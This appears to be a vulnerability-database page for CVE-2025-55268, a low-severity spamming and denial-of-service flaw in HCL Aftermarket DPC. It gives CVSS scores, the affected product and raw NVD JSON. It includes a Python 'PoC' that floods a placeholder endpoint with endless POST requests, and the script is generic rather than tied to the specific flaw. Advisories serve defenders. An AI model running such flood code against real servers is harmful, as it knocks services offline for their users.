Security Vulnerability Report
CVE-2025-55268 CVSS 4.3 MEDIUM

CVE-2025-55268

Published: 2026-03-26 13:16:26
Last Modified: 2026-03-26 20:34:21

Description

HCL Aftermarket DPC is affected by a spamming vulnerability that can allow an actor to send excessive spam, consuming server bandwidth and processing resources, which may lead to denial of service.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:* - VULNERABLE
HCL Aftermarket DPC (see the vendor advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import time

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://target-server/vulnerable-endpoint"


def spam_attack():
    headers = {
        "User-Agent": "Mozilla/5.0 (Compatible; CVE-2025-55268 PoC)",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    payload = {
        "message": "Spam data to consume resources"
    }
    print("[+] Starting spam attack simulation...")
    try:
        while True:
            # Send POST request continuously
            response = requests.post(target_url, data=payload, headers=headers, timeout=5)
            print(f"[+] Request sent, Status Code: {response.status_code}")
            time.sleep(0.1)  # Minimal delay to flood the server
    except KeyboardInterrupt:
        print("\n[-] Attack stopped by user.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    spam_attack()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55268", "sourceIdentifier": "[email protected]", "published": "2026-03-26T13:16:26.103", "lastModified": "2026-03-26T20:34:20.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL Aftermarket DPC is affected by Spamming Vulnerability which can allow the actor to excessive spamming can consume server bandwidth and processing resources which may lead to Denial of Service."}, {"lang": "es", "value": "HCL Aftermarket DPC se ve afectado por una Vulnerabilidad de spamming que puede permitir al actor que el spamming excesivo consuma ancho de banda del servidor y recursos de procesamiento, lo que puede llevar a una Denegación de Servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-799"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aftermarket_cloud:1.0.0:*:*:*:*:*:*:*", "matchCriteriaId": 
"C71E5E64-ED4C-4763-8A74-5F9DDCFD13DA"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129793", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}